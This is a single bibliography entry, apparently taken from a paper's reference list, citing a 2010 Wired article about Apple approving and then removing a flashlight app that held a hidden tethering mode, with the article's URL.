[20] Wired. Apple Approves, Pulls Flashlight
App with Hidden Tethering Mode. http:
//www.wired.com/gadgetlab/2010/07/
apple-approves-pulls-flashlight%
2dapp-with-hidden-tethering-mode/.